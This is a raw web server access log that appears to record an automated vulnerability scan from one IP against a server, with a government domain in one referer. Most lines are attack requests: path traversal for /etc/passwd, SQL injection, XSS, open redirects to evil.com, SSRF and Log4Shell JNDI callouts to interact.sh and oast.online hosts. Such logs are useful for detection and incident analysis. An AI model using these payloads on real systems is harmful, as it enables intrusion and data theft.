Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 204 2023-10-15 10:22:11 103.153.214.94 GET /ゝevil.com - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 207 2023-10-15 10:22:18 103.153.214.94 GET /ーevil.com - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 201 2023-10-15 10:22:24 103.153.214.94 GET /ーevil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 210 2023-10-15 10:22:29 103.153.214.94 GET /redirect/evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 202 2023-10-15 10:22:36 103.153.214.94 GET /cgi-bin/redirect.cgi evil.com 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 201 2023-10-15 10:22:42 103.153.214.94 GET /out evil.com 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 204 2023-10-15 10:22:47 103.153.214.94 GET /login to=http://evil.com 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 200 2023-10-15 10:22:52 103.153.214.94 GET /1/_https@evil.com - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 202 2023-10-15 10:22:57 103.153.214.94 GET /redirect targeturl=https://evil.com 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 207 2023-10-15 10:32:19 103.153.214.94 GET /_nuxt/@fs/etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 211 2023-10-15 10:32:27 103.153.214.94 GET /_nuxt/@fs/windows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 203 2023-10-15 10:37:05 103.153.214.94 GET /__nuxt_error stack=%0A<script>alert(document.domain)</script> 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 201 2023-10-15 10:38:26 103.153.214.94 GET /__nuxt_vite_node__/module/bin/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 8 0 208 2023-10-15 10:38:31 103.153.214.94 GET /__nuxt_vite_node__/module/C:/Windows/System32/calc.exe - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 203 2023-10-15 10:39:44 103.153.214.94 POST /ocpu/library/base/R/do.call/json - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 205 2023-10-15 10:43:34 103.153.214.94 GET /OA_HTML/jsp/bsc/bscpgraph.jsp ifl=/etc/&ifn=passwd 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 209 2023-10-15 10:46:10 103.153.214.94 GET /loyalty_enu/start.swe/>">/script><script>alert(document.domain)</script> - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 207 2023-10-15 10:47:41 103.153.214.94 POST /install/install.php step=4 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 203 2023-10-15 10:47:45 103.153.214.94 GET /install/includes/configure.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 204 2023-10-15 10:48:41 103.153.214.94 GET /Http/webroot/config.json - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 204 2023-10-15 10:48:45 103.153.214.94 GET /Electron/download/windows/windows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 201 2023-10-15 10:49:12 103.153.214.94 GET /index.php m&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test")+and+extractvalue(1,concat(0x7e,md5(999999999)))+--+a 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 201 2023-10-15 10:49:33 103.153.214.94 GET /shindig/gadgets/proxy container=default&url=http://oast.pro 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 201 2023-10-15 10:51:27 103.153.214.94 GET /index.php id=50&file=../../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 207 2023-10-15 10:59:35 103.153.214.94 GET /.well-known/acme-challenge/<?xml+version="1.0"?><x:script+xmlns:x="http:/www.w3.org/1999/xhtml">alert(document.domain)</x:script> - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 209 2023-10-15 11:09:45 103.153.214.94 GET /author_posts.php author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 205 2023-10-15 11:09:48 103.153.214.94 GET /cms/author_posts.php author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 202 2023-10-15 11:11:15 103.153.214.94 GET /fetchBody id=1/../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 210 2023-10-15 11:16:27 103.153.214.94 POST /admin/ajax.php action=login 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 208 2023-10-15 11:16:30 103.153.214.94 GET /admin/index.php page=home 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 301 0 0 202 2023-10-15 11:18:39 103.153.214.94 POST /.antproxy.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 204 2023-10-15 11:18:50 103.153.214.94 DELETE /druid/coordinator/v1/lookups/config/${jndi:ldap:/ckjv7uic8b6p3donsoogixrwywjwtt4ud.oast.online/tea} - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 202 2023-10-15 11:21:13 103.153.214.94 GET /downloadfile.php file=../../../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 208 2023-10-15 11:31:48 103.153.214.94 GET /plug/comment/commentList.asp id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 209 2023-10-15 11:34:27 103.153.214.94 GET /gotoURL.asp url=interact.sh&id=43569 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 206 2023-10-15 11:37:38 103.153.214.94 GET /forums/search/z-->"></script><script>alert(document.domain)</script>/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 215 2023-10-15 11:37:46 103.153.214.94 GET /org_execl_download.action filename=../../../../../../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 203 2023-10-15 11:38:14 103.153.214.94 GET /download.action filename=../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 207 2023-10-15 11:40:35 103.153.214.94 GET /api/downloads fileName=../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 0 2 1245 2023-10-15 11:45:26 103.153.214.94 GET /speedtest url=ckjv7uic8b6p3donsoogxuwtobke88t6s.oast.online 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 204 2023-10-15 11:45:30 103.153.214.94 GET /download.php file=../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 202 2023-10-15 11:49:53 103.153.214.94 GET /plugins/weathermap/editor.php plug=0&mapname=poc.conf&action=set_map_properties¶m¶m2&debug=existing&node_name&node_x&node_y&node_new_name&node_label&node_infourl&node_hover&node_iconfilename=--NONE--&link_name&link_bandwidth_in&link_bandwidth_out&link_target&link_width&link_infourl&link_hover&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 205 2023-10-15 11:49:57 103.153.214.94 GET /plugins/weathermap/configs/poc.conf - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 205 2023-10-15 11:53:06 103.153.214.94 POST /goform/formping - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 202 2023-10-15 11:53:14 103.153.214.94 GET /pingmessages - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 201 2023-10-15 11:54:26 103.153.214.94 GET /bitrix/rk.php goto=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 204 2023-10-15 11:54:34 103.153.214.94 GET /bitrix/redirect.php event1&event2&event3&goto=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 201 2023-10-15 11:54:42 103.153.214.94 GET /bitrix/redirect.php event3=352513&goto=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 200 2023-10-15 11:54:49 103.153.214.94 GET /bitrix/redirect.php event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 208 2023-10-15 11:54:56 103.153.214.94 GET /bitrix/redirect.php site_id=s1&event1=select_product_t1&event2=contributions&goto=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 204 2023-10-15 11:55:03 103.153.214.94 GET /bitrix/redirect.php event1&event2&event3=download&goto=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 201 2023-10-15 11:55:11 103.153.214.94 GET /bitrix/rk.php id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 204 2023-10-15 11:55:20 103.153.214.94 GET /bitrix/rk.php id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 205 2023-10-15 11:55:31 103.153.214.94 GET /bitrix/rk.php id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 204 2023-10-15 11:55:41 103.153.214.94 GET /bitrix/rk.php id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 200 2023-10-15 11:55:50 103.153.214.94 GET /bitrix/redirect.php event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2&event3=download&goto=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 203 2023-10-15 11:55:59 103.153.214.94 GET /bitrix/redirect.php event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2&event3=download&goto=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 199 2023-10-15 12:00:34 103.153.214.94 GET /usr-cgi/logdownload.cgi file=../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 203 2023-10-15 12:11:56 103.153.214.94 GET / {alert(document.domain)} 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 211 2023-10-15 12:13:10 103.153.214.94 POST /main/inc/ajax/extra_field.ajax.php a=search_options_from_tags 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 207 2023-10-15 12:13:19 103.153.214.94 POST /main/inc/ajax/extra_field.ajax.php a=search_options_from_tags 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 205 2023-10-15 12:15:21 103.153.214.94 GET /CFIDE/debug/cf_debugFr.cfm userPage=javascript:alert(1) 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 204 2023-10-15 12:15:27 103.153.214.94 GET /cfusion/debug/cf_debugFr.cfm userPage=javascript:alert(1) 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 205 2023-10-15 12:16:31 103.153.214.94 GET /db_dump.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn/user_add.php 200 0 0 205 2023-10-15 12:20:01 103.153.214.94 GET /overview.asp - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 207 2023-10-15 12:23:44 103.153.214.94 GET /_users/_all_docs - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 203 2023-10-15 12:25:20 103.153.214.94 POST /Upload/upload_file.php l=test 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 207 2023-10-15 12:25:28 103.153.214.94 GET /Upload/test/2WfF0TF744kVvJOhozNg3QKK961.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 206 2023-10-15 12:28:04 103.153.214.94 GET /api/file path=../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 0 2 217 2023-10-15 12:31:53 103.153.214.94 GET /classes/phpmailer/class.cs_phpmailer.php classes_dir=../../../../../../../../../../../etc/passwd%00 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 209 2023-10-15 12:34:46 103.153.214.94 POST /index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 205 2023-10-15 12:42:30 103.153.214.94 GET /exportFile UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 205 2023-10-15 12:51:04 103.153.214.94 GET /email/unsubscribed email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 205 2023-10-15 12:51:57 103.153.214.94 GET /metadata/v1.json - 443 - 193.123.37.162 - - 200 0 0 204 2023-10-15 12:54:36 103.153.214.94 POST /cgi-bin/logo_extra_upload.cgi - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 207 2023-10-15 12:54:42 103.153.214.94 GET /logo/2WfF0cPGjLBnRiE8UEARsfVNSTY.txt - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 207 2023-10-15 12:56:23 103.153.214.94 GET /user/City_ajax.aspx CityId=33'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','2WfF0VDQTG6p5ISZyv0fcO0nSJd')),2-- 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 205 2023-10-15 13:01:10 103.153.214.94 GET /portal/attachment_downloadByUrlAtt.action filePath=file:///etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 206 2023-10-15 13:06:28 103.153.214.94 GET /duomiphp/ajax.php action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(999999999))) 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 205 2023-10-15 13:06:40 103.153.214.94 POST /index.php mod=system&op=orgtree&do=orgtree 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 207 2023-10-15 13:09:53 103.153.214.94 GET /application/down.php dw=config/config.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 212 2023-10-15 13:13:43 103.153.214.94 POST /weaver/weaver.file.FileDownloadForOutDoc - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 207 2023-10-15 13:23:49 103.153.214.94 GET /user.php act=login 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1+procedure+analyse(extractvalue(rand(),concat(0x7e,version())),1)--+-";s:2:"id";i:1;} 200 0 0 207 2023-10-15 13:23:56 103.153.214.94 GET /user.php act=login 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT+1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10--+-";s:2:"id";s:11:"-1'+UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca 200 0 0 200 2023-10-15 13:32:37 103.153.214.94 GET /showfile.php file=/etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 203 2023-10-15 13:33:15 103.153.214.94 GET /dlibrary/null oldfile=../../../../../../windows/win.ini&library=null 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 203 2023-10-15 13:34:30 103.153.214.94 GET /php/connector.minimal.php cmd=file&target=l1_Li8vLi4vLy4uLy8uLi8vLi4vLy4uLy8uLi9ldGMvcGFzc3dk&download=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 206 2023-10-15 13:41:35 103.153.214.94 GET /_search a=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-372%7D$%7B%3A-253%7D.$%7BhostName%7D.search.ckjv7uic8b6p3donsoogxrau9twg71noz.oast.online%7D 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 207 2023-10-15 13:45:55 103.153.214.94 GET /e/ViewImg/index.html url=javascript:alert(document.domain) 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 206 2023-10-15 13:47:37 103.153.214.94 POST /process/aprocess.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 208 2023-10-15 13:51:23 103.153.214.94 GET /cities country=/../../../../../../../../etc/passwd 443 - 193.123.37.162 